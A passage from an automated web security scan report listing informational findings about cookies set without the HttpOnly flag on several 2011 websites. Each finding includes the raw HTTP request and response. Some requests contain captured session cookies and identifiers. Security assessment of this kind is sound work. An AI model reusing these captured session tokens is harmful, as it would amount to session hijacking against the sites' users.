User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 8184
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:13 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*
* jQuery UI 1.7.3
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.
...[SNIP]...
18.272. http://www.hunton.com/include_common/jQuery/ui.draggable.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/ui.draggable.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/ui.draggable.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 18582
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:30 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

/*
* jQuery UI Draggable 1.7.3
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* ht
...[SNIP]...
18.273. http://www.hunton.com/include_common/jQuery/ui.droppable.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /include_common/jQuery/ui.droppable.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include_common/jQuery/ui.droppable.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 5985
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:58:08 GMT
Accept-Ranges: bytes
ETag: "0d85f3adce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:31 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*
* jQuery UI Droppable 1.7.3
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* ht
...[SNIP]...
18.274. http://www.hunton.com/load.vcf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /load.vcf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load.vcf?type=atty&id=6749bda9-b5a2-45ae-a5bc-0ca5a9401ed3 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/x-vcard
Content-Length: 381

BEGIN:VCARD
FN:W. Alan Kailer
N:Kailer;W.;Alan;;
ADR;WORK;ENCODING=QUOTED-PRINTABLE:;;Hunton & Williams LLP =0D=0A1445 Ross Avenue, Suite 3700;Dallas;Texas;75202;United States of America
TEL;WORK:
...[SNIP]...
18.275. http://www.hunton.com/private_wealth_advisors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /private_wealth_advisors/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /private_wealth_advisors/ HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:29:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.276. http://www.hunton.com/sitemap/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /sitemap/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap/uniGC.aspx?xpST=SiteMap HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:30:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1856; path=/
Set-Cookie: PortletId=5993402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
18.277. http://www.millersweld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.millersweld.com
Proxy-Connection: keep-alive
Referer: http://www.millersweld.com/error.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Set-Cookie: sid=3r9put3msaferh9c77spctg0c2; expires=Sat, 07 May 2011 19:10:00 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Fri, 06 May 2011 19:10:00 GMT
Server: lighttpd
Content-Length: 828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
18.278. http://www.millerwelds.com/financing/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /financing/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:11:26 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 15555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
18.279. http://www.myroitracking.com/newServing/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myroitracking.com
Path:   /newServing/tracking_id.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newServing/tracking_id.php?d=serw.clicksor.com&r=http%3A%2F%2Fserw.clicksor.com%2FnewServing%2Ftracking_id.php%3Fb%3D1%26&gtruid=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.myroitracking.com

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 15:47:09 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: TRUID=13046968294316; expires=Sun, 05-Jun-2011 15:47:09 GMT; path=/; domain=.myroitracking.com
Location: http://serw.clicksor.com/newServing/tracking_id.php?b=1&UID=13046968294316&TRSTR=1&RTID=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

18.280. http://www.networksolutions.com/css/gzip_1067997057/css/legal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1067997057/css/legal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/gzip_1067997057/css/legal.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:09 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:09 GMT
Date: Sat, 07 May 2011 01:01:09 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:09 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:09 GMT; Path=/
Content-Length: 5100

#wrapper .container .box.legal{background:#ffffff;}#wrapper .container .box.legal #productDetails{float:left;margin:0 0 20px 0;width:940px;background:transparent;}#wrapper .container .box.legal #produ
...[SNIP]...
18.281. http://www.networksolutions.com/css/gzip_1721580421/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1721580421/css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/gzip_1721580421/css/print.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:10 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:10 GMT
Date: Sat, 07 May 2011 01:01:10 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:10 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:10 GMT; Path=/
Content-Length: 51

#wrapper #masthead, #wrapper #footer{display:none;}
18.282. http://www.networksolutions.com/css/gzip_1778421796/bundles/template.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_1778421796/bundles/template.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/gzip_1778421796/bundles/template.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:09 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:09 GMT
Date: Sat, 07 May 2011 01:01:09 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:09 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:09 GMT; Path=/
Content-Length: 66525

#wrapper .container .box{float:left;position:relative;margin:10px;background:#FFF;z-index:1;}#wrapper .container .box.cap{margin-right:0;}#wrapper .container .box.transparent{background:transparent no
...[SNIP]...
18.283. http://www.networksolutions.com/css/gzip_N1611004770/bundles/ns0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /css/gzip_N1611004770/bundles/ns0.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/gzip_N1611004770/bundles/ns0.css HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:08 GMT
Cache-Control: private,max-age=3600
Content-type: text/css;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:08 GMT
Date: Sat, 07 May 2011 01:01:08 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:08 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:08 GMT; Path=/
Content-Length: 23137

*{margin:0;padding:0;}body{font-family:trebuchet ms, arial, verdana, sans-serif;color:#333;text-align:center;background:#EEE;}#wrapper{clear:both;margin:0 auto;width:960px;text-align:left;}#wrapper .c
...[SNIP]...
18.284. http://www.networksolutions.com/js/gzip_117311061/js/utils/LivePerson-mtagconfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_117311061/js/utils/LivePerson-mtagconfig.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gzip_117311061/js/utils/LivePerson-mtagconfig.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:08 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
Expires: Fri, 07 May 2021 01:01:08 GMT
Date: Sat, 07 May 2011 01:01:08 GMT
Set-cookie: currency=USD; Expires=Mon, 15-Mar-2021 01:01:08 GMT; Path=/
Set-cookie: vertigo=false; Expires=Sun, 06-May-2012 01:01:08 GMT; Path=/
Content-Length: 3712


var lpMTagConfig={'lpServer':'server.iad.liveperson.net','lpNumber':'43040610','lpProtocol':(document.location.toString().indexOf('https:')==0)?'https':'http','lpTagLoaded':false,'lpTagSrv':'server.i
...[SNIP]...
18.285. http://www.networksolutions.com/js/gzip_1540985833/bundles/template.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networksolutions.com
Path:   /js/gzip_1540985833/bundles/template.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gzip_1540985833/bundles/template.js HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/legal/SSL-legal-repository-rpg.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7f8e49df033150c7e2facec877d3; JROUTE=0xLO; vrsnsf=7f8e49df033150c7e2facec877d3; siteId=46064836-12; currency=USD; vertigo=false

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 07 May 2011 01:01:09 GMT
Cache-Control: private,max-age=3600
Content-type: text/javascript;charset=UTF-8
X-powered-by: Servlet/2.5
Cache-control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-modified: Sun, 06 Nov 2005 12:00:00 GMT
Etag: W/2740050219
